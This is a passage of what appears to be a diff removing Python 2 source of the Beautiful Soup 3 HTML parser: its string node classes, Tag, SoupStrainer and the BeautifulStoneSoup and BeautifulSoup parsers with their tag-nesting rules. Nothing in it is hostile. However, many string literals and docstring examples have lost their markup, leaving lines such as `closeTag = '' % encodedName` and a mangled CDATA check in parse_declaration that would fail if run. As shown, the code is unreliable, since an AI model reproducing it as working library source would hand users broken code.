NavigableString. - - When unpickling a NavigableString, this method is called with - the string in DEFAULT_OUTPUT_ENCODING. That encoding needs to be - passed in to the superclass's __new__ or the superclass won't know - how to handle non-ASCII characters. - """ - if isinstance(value, unicode): - return unicode.__new__(cls, value) - return unicode.__new__(cls, value, DEFAULT_OUTPUT_ENCODING) - - def __getnewargs__(self): - return (NavigableString.__str__(self),) - - def __getattr__(self, attr): - """text.string gives you text. This is for backwards - compatibility for Navigable*String, but for CData* it lets you - get the string without the CData wrapper.""" - if attr == 'string': - return self - else: - raise AttributeError, "'%s' object has no attribute '%s'" % (self.__class__.__name__, attr) - - def __unicode__(self): - return str(self).decode(DEFAULT_OUTPUT_ENCODING) - - def __str__(self, encoding=DEFAULT_OUTPUT_ENCODING): - # Substitute outgoing XML entities. - data = self.BARE_AMPERSAND_OR_BRACKET.sub(self._sub_entity, self) - if encoding: - return data.encode(encoding) - else: - return data - -class CData(NavigableString): - - def __str__(self, encoding=DEFAULT_OUTPUT_ENCODING): - return "" % NavigableString.__str__(self, encoding) - -class ProcessingInstruction(NavigableString): - def __str__(self, encoding=DEFAULT_OUTPUT_ENCODING): - output = self - if "%SOUP-ENCODING%" in output: - output = self.substituteEncoding(output, encoding) - return "" % self.toEncoding(output, encoding) - -class Comment(NavigableString): - def __str__(self, encoding=DEFAULT_OUTPUT_ENCODING): - return "" % NavigableString.__str__(self, encoding) - -class Declaration(NavigableString): - def __str__(self, encoding=DEFAULT_OUTPUT_ENCODING): - return "" % NavigableString.__str__(self, encoding) - -class Tag(PageElement): - - """Represents a found HTML tag with its attributes and contents.""" - - def _convertEntities(self, match): - """Used in a call to re.sub to replace HTML, XML, and numeric - entities with the appropriate Unicode characters. If HTML - entities are being converted, any unrecognized entities are - escaped.""" - x = match.group(1) - if self.convertHTMLEntities and x in name2codepoint: - return unichr(name2codepoint[x]) - elif x in self.XML_ENTITIES_TO_SPECIAL_CHARS: - if self.convertXMLEntities: - return self.XML_ENTITIES_TO_SPECIAL_CHARS[x] - else: - return u'&%s;' % x - elif len(x) > 0 and x[0] == '#': - # Handle numeric entities - if len(x) > 1 and x[1] == 'x': - return unichr(int(x[2:], 16)) - else: - return unichr(int(x[1:])) - - elif self.escapeUnrecognizedEntities: - return u'&%s;' % x - else: - return u'&%s;' % x - - def __init__(self, parser, name, attrs=None, parent=None, - previous=None): - "Basic constructor." - - # We don't actually store the parser object: that lets extracted - # chunks be garbage-collected - self.parserClass = parser.__class__ - self.isSelfClosing = parser.isSelfClosingTag(name) - self.name = name - if attrs is None: - attrs = [] - elif isinstance(attrs, dict): - attrs = attrs.items() - self.attrs = attrs - self.contents = [] - self.setup(parent, previous) - self.hidden = False - self.containsSubstitutions = False - self.convertHTMLEntities = parser.convertHTMLEntities - self.convertXMLEntities = parser.convertXMLEntities - self.escapeUnrecognizedEntities = parser.escapeUnrecognizedEntities - - # Convert any HTML, XML, or numeric entities in the attribute values. - convert = lambda(k, val): (k, - re.sub("&(#\d+|#x[0-9a-fA-F]+|\w+);", - self._convertEntities, - val)) - self.attrs = map(convert, self.attrs) - - def getString(self): - if (len(self.contents) == 1 - and isinstance(self.contents[0], NavigableString)): - return self.contents[0] - - def setString(self, string): - """Replace the contents of the tag with a string""" - self.clear() - self.append(string) - - string = property(getString, setString) - - def getText(self, separator=u""): - if not len(self.contents): - return u"" - stopNode = self._lastRecursiveChild().next - strings = [] - current = self.contents[0] - while current is not stopNode: - if isinstance(current, NavigableString): - strings.append(current.strip()) - current = current.next - return separator.join(strings) - - text = property(getText) - - def get(self, key, default=None): - """Returns the value of the 'key' attribute for the tag, or - the value given for 'default' if it doesn't have that - attribute.""" - return self._getAttrMap().get(key, default) - - def clear(self): - """Extract all children.""" - for child in self.contents[:]: - child.extract() - - def index(self, element): - for i, child in enumerate(self.contents): - if child is element: - return i - raise ValueError("Tag.index: element not in tag") - - def has_key(self, key): - return self._getAttrMap().has_key(key) - - def __getitem__(self, key): - """tag[key] returns the value of the 'key' attribute for the tag, - and throws an exception if it's not there.""" - return self._getAttrMap()[key] - - def __iter__(self): - "Iterating over a tag iterates over its contents." - return iter(self.contents) - - def __len__(self): - "The length of a tag is the length of its list of contents." - return len(self.contents) - - def __contains__(self, x): - return x in self.contents - - def __nonzero__(self): - "A tag is non-None even if it has no contents." - return True - - def __setitem__(self, key, value): - """Setting tag[key] sets the value of the 'key' attribute for the - tag.""" - self._getAttrMap() - self.attrMap[key] = value - found = False - for i in xrange(0, len(self.attrs)): - if self.attrs[i][0] == key: - self.attrs[i] = (key, value) - found = True - if not found: - self.attrs.append((key, value)) - self._getAttrMap()[key] = value - - def __delitem__(self, key): - "Deleting tag[key] deletes all 'key' attributes for the tag." - for item in self.attrs: - if item[0] == key: - self.attrs.remove(item) - #We don't break because bad HTML can define the same - #attribute multiple times. - self._getAttrMap() - if self.attrMap.has_key(key): - del self.attrMap[key] - - def __call__(self, *args, **kwargs): - """Calling a tag like a function is the same as calling its - findAll() method. Eg. tag('a') returns a list of all the A tags - found within this tag.""" - return apply(self.findAll, args, kwargs) - - def __getattr__(self, tag): - #print "Getattr %s.%s" % (self.__class__, tag) - if len(tag) > 3 and tag.rfind('Tag') == len(tag)-3: - return self.find(tag[:-3]) - elif tag.find('__') != 0: - return self.find(tag) - raise AttributeError, "'%s' object has no attribute '%s'" % (self.__class__, tag) - - def __eq__(self, other): - """Returns true iff this tag has the same name, the same attributes, - and the same contents (recursively) as the given tag. - - NOTE: right now this will return false if two tags have the - same attributes in a different order. Should this be fixed?""" - if other is self: - return True - if not hasattr(other, 'name') or not hasattr(other, 'attrs') or not hasattr(other, 'contents') or self.name != other.name or self.attrs != other.attrs or len(self) != len(other): - return False - for i in xrange(0, len(self.contents)): - if self.contents[i] != other.contents[i]: - return False - return True - - def __ne__(self, other): - """Returns true iff this tag is not identical to the other tag, - as defined in __eq__.""" - return not self == other - - def __repr__(self, encoding=DEFAULT_OUTPUT_ENCODING): - """Renders this tag as a string.""" - return self.__str__(encoding) - - def __unicode__(self): - return self.__str__(None) - - def __str__(self, encoding=DEFAULT_OUTPUT_ENCODING, - prettyPrint=False, indentLevel=0): - """Returns a string or Unicode representation of this tag and - its contents. To get Unicode, pass None for encoding. - - NOTE: since Python's HTML parser consumes whitespace, this - method is not certain to reproduce the whitespace present in - the original string.""" - - encodedName = self.toEncoding(self.name, encoding) - - attrs = [] - if self.attrs: - for key, val in self.attrs: - fmt = '%s="%s"' - if isinstance(val, basestring): - if self.containsSubstitutions and '%SOUP-ENCODING%' in val: - val = self.substituteEncoding(val, encoding) - - # The attribute value either: - # - # * Contains no embedded double quotes or single quotes. - # No problem: we enclose it in double quotes. - # * Contains embedded single quotes. No problem: - # double quotes work here too. - # * Contains embedded double quotes. No problem: - # we enclose it in single quotes. - # * Embeds both single _and_ double quotes. This - # can't happen naturally, but it can happen if - # you modify an attribute value after parsing - # the document. Now we have a bit of a - # problem. We solve it by enclosing the - # attribute in single quotes, and escaping any - # embedded single quotes to XML entities. - if '"' in val: - fmt = "%s='%s'" - if "'" in val: - # TODO: replace with apos when - # appropriate. - val = val.replace("'", "&squot;") - - # Now we're okay w/r/t quotes. But the attribute - # value might also contain angle brackets, or - # ampersands that aren't part of entities. We need - # to escape those to XML entities too. - val = self.BARE_AMPERSAND_OR_BRACKET.sub(self._sub_entity, val) - - attrs.append(fmt % (self.toEncoding(key, encoding), - self.toEncoding(val, encoding))) - close = '' - closeTag = '' - if self.isSelfClosing: - close = ' /' - else: - closeTag = '' % encodedName - - indentTag, indentContents = 0, 0 - if prettyPrint: - indentTag = indentLevel - space = (' ' * (indentTag-1)) - indentContents = indentTag + 1 - contents = self.renderContents(encoding, prettyPrint, indentContents) - if self.hidden: - s = contents - else: - s = [] - attributeString = '' - if attrs: - attributeString = ' ' + ' '.join(attrs) - if prettyPrint: - s.append(space) - s.append('<%s%s%s>' % (encodedName, attributeString, close)) - if prettyPrint: - s.append("\n") - s.append(contents) - if prettyPrint and contents and contents[-1] != "\n": - s.append("\n") - if prettyPrint and closeTag: - s.append(space) - s.append(closeTag) - if prettyPrint and closeTag and self.nextSibling: - s.append("\n") - s = ''.join(s) - return s - - def decompose(self): - """Recursively destroys the contents of this tree.""" - self.extract() - if len(self.contents) == 0: - return - current = self.contents[0] - while current is not None: - next = current.next - if isinstance(current, Tag): - del current.contents[:] - current.parent = None - current.previous = None - current.previousSibling = None - current.next = None - current.nextSibling = None - current = next - - def prettify(self, encoding=DEFAULT_OUTPUT_ENCODING): - return self.__str__(encoding, True) - - def renderContents(self, encoding=DEFAULT_OUTPUT_ENCODING, - prettyPrint=False, indentLevel=0): - """Renders the contents of this tag as a string in the given - encoding. If encoding is None, returns a Unicode string..""" - s=[] - for c in self: - text = None - if isinstance(c, NavigableString): - text = c.__str__(encoding) - elif isinstance(c, Tag): - s.append(c.__str__(encoding, prettyPrint, indentLevel)) - if text and prettyPrint: - text = text.strip() - if text: - if prettyPrint: - s.append(" " * (indentLevel-1)) - s.append(text) - if prettyPrint: - s.append("\n") - return ''.join(s) - - #Soup methods - - def find(self, name=None, attrs={}, recursive=True, text=None, - **kwargs): - """Return only the first child of this Tag matching the given - criteria.""" - r = None - l = self.findAll(name, attrs, recursive, text, 1, **kwargs) - if l: - r = l[0] - return r - findChild = find - - def findAll(self, name=None, attrs={}, recursive=True, text=None, - limit=None, **kwargs): - """Extracts a list of Tag objects that match the given - criteria. You can specify the name of the Tag and any - attributes you want the Tag to have. - - The value of a key-value pair in the 'attrs' map can be a - string, a list of strings, a regular expression object, or a - callable that takes a string and returns whether or not the - string matches for some custom definition of 'matches'. The - same is true of the tag name.""" - generator = self.recursiveChildGenerator - if not recursive: - generator = self.childGenerator - return self._findAll(name, attrs, text, limit, generator, **kwargs) - findChildren = findAll - - # Pre-3.x compatibility methods - first = find - fetch = findAll - - def fetchText(self, text=None, recursive=True, limit=None): - return self.findAll(text=text, recursive=recursive, limit=limit) - - def firstText(self, text=None, recursive=True): - return self.find(text=text, recursive=recursive) - - #Private methods - - def _getAttrMap(self): - """Initializes a map representation of this tag's attributes, - if not already initialized.""" - if not getattr(self, 'attrMap'): - self.attrMap = {} - for (key, value) in self.attrs: - self.attrMap[key] = value - return self.attrMap - - #Generator methods - def childGenerator(self): - # Just use the iterator from the contents - return iter(self.contents) - - def recursiveChildGenerator(self): - if not len(self.contents): - raise StopIteration - stopNode = self._lastRecursiveChild().next - current = self.contents[0] - while current is not stopNode: - yield current - current = current.next - - -# Next, a couple classes to represent queries and their results. -class SoupStrainer: - """Encapsulates a number of ways of matching a markup element (tag or - text).""" - - def __init__(self, name=None, attrs={}, text=None, **kwargs): - self.name = name - if isinstance(attrs, basestring): - kwargs['class'] = _match_css_class(attrs) - attrs = None - if kwargs: - if attrs: - attrs = attrs.copy() - attrs.update(kwargs) - else: - attrs = kwargs - self.attrs = attrs - self.text = text - - def __str__(self): - if self.text: - return self.text - else: - return "%s|%s" % (self.name, self.attrs) - - def searchTag(self, markupName=None, markupAttrs={}): - found = None - markup = None - if isinstance(markupName, Tag): - markup = markupName - markupAttrs = markup - callFunctionWithTagData = callable(self.name) \ - and not isinstance(markupName, Tag) - - if (not self.name) \ - or callFunctionWithTagData \ - or (markup and self._matches(markup, self.name)) \ - or (not markup and self._matches(markupName, self.name)): - if callFunctionWithTagData: - match = self.name(markupName, markupAttrs) - else: - match = True - markupAttrMap = None - for attr, matchAgainst in self.attrs.items(): - if not markupAttrMap: - if hasattr(markupAttrs, 'get'): - markupAttrMap = markupAttrs - else: - markupAttrMap = {} - for k,v in markupAttrs: - markupAttrMap[k] = v - attrValue = markupAttrMap.get(attr) - if not self._matches(attrValue, matchAgainst): - match = False - break - if match: - if markup: - found = markup - else: - found = markupName - return found - - def search(self, markup): - #print 'looking for %s in %s' % (self, markup) - found = None - # If given a list of items, scan it for a text element that - # matches. - if hasattr(markup, "__iter__") \ - and not isinstance(markup, Tag): - for element in markup: - if isinstance(element, NavigableString) \ - and self.search(element): - found = element - break - # If it's a Tag, make sure its name or attributes match. - # Don't bother with Tags if we're searching for text. - elif isinstance(markup, Tag): - if not self.text: - found = self.searchTag(markup) - # If it's text, make sure the text matches. - elif isinstance(markup, NavigableString) or \ - isinstance(markup, basestring): - if self._matches(markup, self.text): - found = markup - else: - raise Exception, "I don't know how to match against a %s" \ - % markup.__class__ - return found - - def _matches(self, markup, matchAgainst): - #print "Matching %s against %s" % (markup, matchAgainst) - result = False - if matchAgainst is True: - result = markup is not None - elif callable(matchAgainst): - result = matchAgainst(markup) - else: - #Custom match methods take the tag as an argument, but all - #other ways of matching match the tag name as a string. - if isinstance(markup, Tag): - markup = markup.name - if markup and not isinstance(markup, basestring): - markup = unicode(markup) - #Now we know that chunk is either a string, or None. - if hasattr(matchAgainst, 'match'): - # It's a regexp object. - result = markup and matchAgainst.search(markup) - elif hasattr(matchAgainst, '__iter__'): # list-like - result = markup in matchAgainst - elif hasattr(matchAgainst, 'items'): - result = markup.has_key(matchAgainst) - elif matchAgainst and isinstance(markup, basestring): - if isinstance(markup, unicode): - matchAgainst = unicode(matchAgainst) - else: - matchAgainst = str(matchAgainst) - - if not result: - result = matchAgainst == markup - return result - -class ResultSet(list): - """A ResultSet is just a list that keeps track of the SoupStrainer - that created it.""" - def __init__(self, source): - list.__init__([]) - self.source = source - -# Now, some helper functions. - -def buildTagMap(default, *args): - """Turns a list of maps, lists, or scalars into a single map. - Used to build the SELF_CLOSING_TAGS, NESTABLE_TAGS, and - NESTING_RESET_TAGS maps out of lists and partial maps.""" - built = {} - for portion in args: - if hasattr(portion, 'items'): - #It's a map. Merge it. - for k,v in portion.items(): - built[k] = v - elif hasattr(portion, '__iter__'): # is a list - #It's a list. Map each item to the default. - for k in portion: - built[k] = default - else: - #It's a scalar. Map it to the default. - built[portion] = default - return built - -# Now, the parser classes. - -class BeautifulStoneSoup(Tag, SGMLParser): - - """This class contains the basic parser and search code. It defines - a parser that knows nothing about tag behavior except for the - following: - - You can't close a tag without closing all the tags it encloses. - That is, "" actually means - "". - - [Another possible explanation is "", but since - this class defines no SELF_CLOSING_TAGS, it will never use that - explanation.] - - This class is useful for parsing XML or made-up markup languages, - or when BeautifulSoup makes an assumption counter to what you were - expecting.""" - - SELF_CLOSING_TAGS = {} - NESTABLE_TAGS = {} - RESET_NESTING_TAGS = {} - QUOTE_TAGS = {} - PRESERVE_WHITESPACE_TAGS = [] - - MARKUP_MASSAGE = [(re.compile('(<[^<>]*)/>'), - lambda x: x.group(1) + ' />'), - (re.compile(']*)>'), - lambda x: '') - ] - - ROOT_TAG_NAME = u'[document]' - - HTML_ENTITIES = "html" - XML_ENTITIES = "xml" - XHTML_ENTITIES = "xhtml" - # TODO: This only exists for backwards-compatibility - ALL_ENTITIES = XHTML_ENTITIES - - # Used when determining whether a text node is all whitespace and - # can be replaced with a single space. A text node that contains - # fancy Unicode spaces (usually non-breaking) should be left - # alone. - STRIP_ASCII_SPACES = { 9: None, 10: None, 12: None, 13: None, 32: None, } - - def __init__(self, markup="", parseOnlyThese=None, fromEncoding=None, - markupMassage=True, smartQuotesTo=XML_ENTITIES, - convertEntities=None, selfClosingTags=None, isHTML=False): - """The Soup object is initialized as the 'root tag', and the - provided markup (which can be a string or a file-like object) - is fed into the underlying parser. - - sgmllib will process most bad HTML, and the BeautifulSoup - class has some tricks for dealing with some HTML that kills - sgmllib, but Beautiful Soup can nonetheless choke or lose data - if your data uses self-closing tags or declarations - incorrectly. - - By default, Beautiful Soup uses regexes to sanitize input, - avoiding the vast majority of these problems. If the problems - don't apply to you, pass in False for markupMassage, and - you'll get better performance. - - The default parser massage techniques fix the two most common - instances of invalid HTML that choke sgmllib: - -
    (No space between name of closing tag and tag close) - (Extraneous whitespace in declaration) - - You can pass in a custom list of (RE object, replace method) - tuples to get Beautiful Soup to scrub your input the way you - want.""" - - self.parseOnlyThese = parseOnlyThese - self.fromEncoding = fromEncoding - self.smartQuotesTo = smartQuotesTo - self.convertEntities = convertEntities - # Set the rules for how we'll deal with the entities we - # encounter - if self.convertEntities: - # It doesn't make sense to convert encoded characters to - # entities even while you're converting entities to Unicode. - # Just convert it all to Unicode. - self.smartQuotesTo = None - if convertEntities == self.HTML_ENTITIES: - self.convertXMLEntities = False - self.convertHTMLEntities = True - self.escapeUnrecognizedEntities = True - elif convertEntities == self.XHTML_ENTITIES: - self.convertXMLEntities = True - self.convertHTMLEntities = True - self.escapeUnrecognizedEntities = False - elif convertEntities == self.XML_ENTITIES: - self.convertXMLEntities = True - self.convertHTMLEntities = False - self.escapeUnrecognizedEntities = False - else: - self.convertXMLEntities = False - self.convertHTMLEntities = False - self.escapeUnrecognizedEntities = False - - self.instanceSelfClosingTags = buildTagMap(None, selfClosingTags) - SGMLParser.__init__(self) - - if hasattr(markup, 'read'): # It's a file-type object. - markup = markup.read() - self.markup = markup - self.markupMassage = markupMassage - try: - self._feed(isHTML=isHTML) - except StopParsing: - pass - self.markup = None # The markup can now be GCed - - def convert_charref(self, name): - """This method fixes a bug in Python's SGMLParser.""" - try: - n = int(name) - except ValueError: - return - if not 0 <= n <= 127 : # ASCII ends at 127, not 255 - return - return self.convert_codepoint(n) - - def _feed(self, inDocumentEncoding=None, isHTML=False): - # Convert the document to Unicode. - markup = self.markup - if isinstance(markup, unicode): - if not hasattr(self, 'originalEncoding'): - self.originalEncoding = None - else: - dammit = UnicodeDammit\ - (markup, [self.fromEncoding, inDocumentEncoding], - smartQuotesTo=self.smartQuotesTo, isHTML=isHTML) - markup = dammit.unicode - self.originalEncoding = dammit.originalEncoding - self.declaredHTMLEncoding = dammit.declaredHTMLEncoding - if markup: - if self.markupMassage: - if not hasattr(self.markupMassage, "__iter__"): - self.markupMassage = self.MARKUP_MASSAGE - for fix, m in self.markupMassage: - markup = fix.sub(m, markup) - # TODO: We get rid of markupMassage so that the - # soup object can be deepcopied later on. Some - # Python installations can't copy regexes. If anyone - # was relying on the existence of markupMassage, this - # might cause problems. - del(self.markupMassage) - self.reset() - - SGMLParser.feed(self, markup) - # Close out any unfinished strings and close all the open tags. - self.endData() - while self.currentTag.name != self.ROOT_TAG_NAME: - self.popTag() - - def __getattr__(self, methodName): - """This method routes method call requests to either the SGMLParser - superclass or the Tag superclass, depending on the method name.""" - #print "__getattr__ called on %s.%s" % (self.__class__, methodName) - - if methodName.startswith('start_') or methodName.startswith('end_') \ - or methodName.startswith('do_'): - return SGMLParser.__getattr__(self, methodName) - elif not methodName.startswith('__'): - return Tag.__getattr__(self, methodName) - else: - raise AttributeError - - def isSelfClosingTag(self, name): - """Returns true iff the given string is the name of a - self-closing tag according to this parser.""" - return self.SELF_CLOSING_TAGS.has_key(name) \ - or self.instanceSelfClosingTags.has_key(name) - - def reset(self): - Tag.__init__(self, self, self.ROOT_TAG_NAME) - self.hidden = 1 - SGMLParser.reset(self) - self.currentData = [] - self.currentTag = None - self.tagStack = [] - self.quoteStack = [] - self.pushTag(self) - - def popTag(self): - tag = self.tagStack.pop() - - #print "Pop", tag.name - if self.tagStack: - self.currentTag = self.tagStack[-1] - return self.currentTag - - def pushTag(self, tag): - #print "Push", tag.name - if self.currentTag: - self.currentTag.contents.append(tag) - self.tagStack.append(tag) - self.currentTag = self.tagStack[-1] - - def endData(self, containerClass=NavigableString): - if self.currentData: - currentData = u''.join(self.currentData) - if (currentData.translate(self.STRIP_ASCII_SPACES) == '' and - not set([tag.name for tag in self.tagStack]).intersection( - self.PRESERVE_WHITESPACE_TAGS)): - if '\n' in currentData: - currentData = '\n' - else: - currentData = ' ' - self.currentData = [] - if self.parseOnlyThese and len(self.tagStack) <= 1 and \ - (not self.parseOnlyThese.text or \ - not self.parseOnlyThese.search(currentData)): - return - o = containerClass(currentData) - o.setup(self.currentTag, self.previous) - if self.previous: - self.previous.next = o - self.previous = o - self.currentTag.contents.append(o) - - - def _popToTag(self, name, inclusivePop=True): - """Pops the tag stack up to and including the most recent - instance of the given tag. If inclusivePop is false, pops the tag - stack up to but *not* including the most recent instqance of - the given tag.""" - #print "Popping to %s" % name - if name == self.ROOT_TAG_NAME: - return - - numPops = 0 - mostRecentTag = None - for i in xrange(len(self.tagStack)-1, 0, -1): - if name == self.tagStack[i].name: - numPops = len(self.tagStack)-i - break - if not inclusivePop: - numPops = numPops - 1 - - for i in xrange(0, numPops): - mostRecentTag = self.popTag() - return mostRecentTag - - def _smartPop(self, name): - - """We need to pop up to the previous tag of this type, unless - one of this tag's nesting reset triggers comes between this - tag and the previous tag of this type, OR unless this tag is a - generic nesting trigger and another generic nesting trigger - comes between this tag and the previous tag of this type. - - Examples: -

    FooBar *

    * should pop to 'p', not 'b'. -

    FooBar *

    * should pop to 'table', not 'p'. -

    Foo

    Bar *

    * should pop to 'tr', not 'p'. - -

    • *
    • * should pop to 'ul', not the first 'li'. -
  • ** should pop to 'table', not the first 'tr' - tag should - implicitly close the previous tag within the same
    ** should pop to 'tr', not the first 'td' - """ - - nestingResetTriggers = self.NESTABLE_TAGS.get(name) - isNestable = nestingResetTriggers != None - isResetNesting = self.RESET_NESTING_TAGS.has_key(name) - popTo = None - inclusive = True - for i in xrange(len(self.tagStack)-1, 0, -1): - p = self.tagStack[i] - if (not p or p.name == name) and not isNestable: - #Non-nestable tags get popped to the top or to their - #last occurance. - popTo = name - break - if (nestingResetTriggers is not None - and p.name in nestingResetTriggers) \ - or (nestingResetTriggers is None and isResetNesting - and self.RESET_NESTING_TAGS.has_key(p.name)): - - #If we encounter one of the nesting reset triggers - #peculiar to this tag, or we encounter another tag - #that causes nesting to reset, pop up to but not - #including that tag. - popTo = p.name - inclusive = False - break - p = p.parent - if popTo: - self._popToTag(popTo, inclusive) - - def unknown_starttag(self, name, attrs, selfClosing=0): - #print "Start tag %s: %s" % (name, attrs) - if self.quoteStack: - #This is not a real tag. - #print "<%s> is not real!" % name - attrs = ''.join([' %s="%s"' % (x, y) for x, y in attrs]) - self.handle_data('<%s%s>' % (name, attrs)) - return - self.endData() - - if not self.isSelfClosingTag(name) and not selfClosing: - self._smartPop(name) - - if self.parseOnlyThese and len(self.tagStack) <= 1 \ - and (self.parseOnlyThese.text or not self.parseOnlyThese.searchTag(name, attrs)): - return - - tag = Tag(self, name, attrs, self.currentTag, self.previous) - if self.previous: - self.previous.next = tag - self.previous = tag - self.pushTag(tag) - if selfClosing or self.isSelfClosingTag(name): - self.popTag() - if name in self.QUOTE_TAGS: - #print "Beginning quote (%s)" % name - self.quoteStack.append(name) - self.literal = 1 - return tag - - def unknown_endtag(self, name): - #print "End tag %s" % name - if self.quoteStack and self.quoteStack[-1] != name: - #This is not a real end tag. - #print " is not real!" % name - self.handle_data('' % name) - return - self.endData() - self._popToTag(name) - if self.quoteStack and self.quoteStack[-1] == name: - self.quoteStack.pop() - self.literal = (len(self.quoteStack) > 0) - - def handle_data(self, data): - self.currentData.append(data) - - def _toStringSubclass(self, text, subclass): - """Adds a certain piece of text to the tree as a NavigableString - subclass.""" - self.endData() - self.handle_data(text) - self.endData(subclass) - - def handle_pi(self, text): - """Handle a processing instruction as a ProcessingInstruction - object, possibly one with a %SOUP-ENCODING% slot into which an - encoding will be plugged later.""" - if text[:3] == "xml": - text = u"xml version='1.0' encoding='%SOUP-ENCODING%'" - self._toStringSubclass(text, ProcessingInstruction) - - def handle_comment(self, text): - "Handle comments as Comment objects." - self._toStringSubclass(text, Comment) - - def handle_charref(self, ref): - "Handle character references as data." - if self.convertEntities: - data = unichr(int(ref)) - else: - data = '&#%s;' % ref - self.handle_data(data) - - def handle_entityref(self, ref): - """Handle entity references as data, possibly converting known - HTML and/or XML entity references to the corresponding Unicode - characters.""" - data = None - if self.convertHTMLEntities: - try: - data = unichr(name2codepoint[ref]) - except KeyError: - pass - - if not data and self.convertXMLEntities: - data = self.XML_ENTITIES_TO_SPECIAL_CHARS.get(ref) - - if not data and self.convertHTMLEntities and \ - not self.XML_ENTITIES_TO_SPECIAL_CHARS.get(ref): - # TODO: We've got a problem here. We're told this is - # an entity reference, but it's not an XML entity - # reference or an HTML entity reference. Nonetheless, - # the logical thing to do is to pass it through as an - # unrecognized entity reference. - # - # Except: when the input is "&carol;" this function - # will be called with input "carol". When the input is - # "AT&T", this function will be called with input - # "T". We have no way of knowing whether a semicolon - # was present originally, so we don't know whether - # this is an unknown entity or just a misplaced - # ampersand. - # - # The more common case is a misplaced ampersand, so I - # escape the ampersand and omit the trailing semicolon. - data = "&%s" % ref - if not data: - # This case is different from the one above, because we - # haven't already gone through a supposedly comprehensive - # mapping of entities to Unicode characters. We might not - # have gone through any mapping at all. So the chances are - # very high that this is a real entity, and not a - # misplaced ampersand. - data = "&%s;" % ref - self.handle_data(data) - - def handle_decl(self, data): - "Handle DOCTYPEs and the like as Declaration objects." - self._toStringSubclass(data, Declaration) - - def parse_declaration(self, i): - """Treat a bogus SGML declaration as raw data. Treat a CDATA - declaration as a CData object.""" - j = None - if self.rawdata[i:i+9] == '', i) - if k == -1: - k = len(self.rawdata) - data = self.rawdata[i+9:k] - j = k+3 - self._toStringSubclass(data, CData) - else: - try: - j = SGMLParser.parse_declaration(self, i) - except SGMLParseError: - toHandle = self.rawdata[i:] - self.handle_data(toHandle) - j = i + len(toHandle) - return j - -class BeautifulSoup(BeautifulStoneSoup): - - """This parser knows the following facts about HTML: - - * Some tags have no closing tag and should be interpreted as being - closed as soon as they are encountered. - - * The text inside some tags (ie. 'script') may contain tags which - are not really part of the document and which should be parsed - as text, not tags. If you want to parse the text as tags, you can - always fetch it and parse it explicitly. - - * Tag nesting rules: - - Most tags can't be nested at all. For instance, the occurance of - a

    tag should implicitly close the previous

    tag. - -

    Para1

    Para2 - should be transformed into: -

    Para1

    Para2 - - Some tags can be nested arbitrarily. For instance, the occurance - of a

    tag should _not_ implicitly close the previous -
    tag. - - Alice said:
    Bob said:
    Blah - should NOT be transformed into: - Alice said:
    Bob said:
    Blah - - Some tags can be nested, but the nesting is reset by the - interposition of other tags. For instance, a
    , - but not close a tag in another table. - -
    BlahBlah - should be transformed into: -
    BlahBlah - but, - Blah
    Blah - should NOT be transformed into - Blah
    Blah - - Differing assumptions about tag nesting rules are a major source - of problems with the BeautifulSoup class. If BeautifulSoup is not - treating as nestable a tag your page author treats as nestable, - try ICantBelieveItsBeautifulSoup, MinimalSoup, or - BeautifulStoneSoup before writing your own subclass.""" - - def __init__(self, *args, **kwargs): - if not kwargs.has_key('smartQuotesTo'): - kwargs['smartQuotesTo'] = self.HTML_ENTITIES - kwargs['isHTML'] = True - BeautifulStoneSoup.__init__(self, *args, **kwargs) - - SELF_CLOSING_TAGS = buildTagMap(None, - ('br' , 'hr', 'input', 'img', 'meta', - 'spacer', 'link', 'frame', 'base', 'col')) - - PRESERVE_WHITESPACE_TAGS = set(['pre', 'textarea']) - - QUOTE_TAGS = {'script' : None, 'textarea' : None} - - #According to the HTML standard, each of these inline tags can - #contain another tag of the same type. Furthermore, it's common - #to actually use these tags this way. - NESTABLE_INLINE_TAGS = ('span', 'font', 'q', 'object', 'bdo', 'sub', 'sup', - 'center') - - #According to the HTML standard, these block tags can contain - #another tag of the same type. Furthermore, it's common - #to actually use these tags this way. - NESTABLE_BLOCK_TAGS = ('blockquote', 'div', 'fieldset', 'ins', 'del') - - #Lists can contain other lists, but there are restrictions. - NESTABLE_LIST_TAGS = { 'ol' : [], - 'ul' : [], - 'li' : ['ul', 'ol'], - 'dl' : [], - 'dd' : ['dl'], - 'dt' : ['dl'] } - - #Tables can contain other tables, but there are restrictions. - NESTABLE_TABLE_TAGS = {'table' : [], - 'tr' : ['table', 'tbody', 'tfoot', 'thead'], - 'td' : ['tr'], - 'th' : ['tr'], - 'thead' : ['table'], - 'tbody' : ['table'], - 'tfoot' : ['table'], - } - - NON_NESTABLE_BLOCK_TAGS = ('address', 'form', 'p', 'pre') - - #If one of these tags is encountered, all tags up to the next tag of - #this type are popped. - RESET_NESTING_TAGS = buildTagMap(None, NESTABLE_BLOCK_TAGS, 'noscript', - NON_NESTABLE_BLOCK_TAGS, - NESTABLE_LIST_TAGS, - NESTABLE_TABLE_TAGS) - - NESTABLE_TAGS = buildTagMap([], NESTABLE_INLINE_TAGS, NESTABLE_BLOCK_TAGS, - NESTABLE_LIST_TAGS, NESTABLE_TABLE_TAGS) - - # Used to detect the charset in a META tag; see start_meta - CHARSET_RE = re.compile("((^|;)\s*charset=)([^;]*)", re.M) - - def start_meta(self, attrs): - """Beautiful Soup can detect a charset included in a META tag, - try to convert the document to that charset, and re-parse the - document from the beginning.""" - httpEquiv = None - contentType = None - contentTypeIndex = None - tagNeedsEncodingSubstitution = False - - for i in xrange(0, len(attrs)): - key, value = attrs[i] - key = key.lower() - if key == 'http-equiv': - httpEquiv = value - elif key == 'content': - contentType = value - contentTypeIndex = i - - if httpEquiv and contentType: # It's an interesting meta tag. - match = self.CHARSET_RE.search(contentType) - if match: - if (self.declaredHTMLEncoding is not None or - self.originalEncoding == self.fromEncoding): - # An HTML encoding was sniffed while converting - # the document to Unicode, or an HTML encoding was - # sniffed during a previous pass through the - # document, or an encoding was specified - # explicitly and it worked. Rewrite the meta tag. - def rewrite(match): - return match.group(1) + "%SOUP-ENCODING%" - newAttr = self.CHARSET_RE.sub(rewrite, contentType) - attrs[contentTypeIndex] = (attrs[contentTypeIndex][0], - newAttr) - tagNeedsEncodingSubstitution = True - else: - # This is our first pass through the document. - # Go through it again with the encoding information. - newCharset = match.group(3) - if newCharset and newCharset != self.originalEncoding: - self.declaredHTMLEncoding = newCharset - self._feed(self.declaredHTMLEncoding) - raise StopParsing - pass - tag = self.unknown_starttag("meta", attrs) - if tag and tagNeedsEncodingSubstitution: - tag.containsSubstitutions = True - -class StopParsing(Exception): - pass - -class 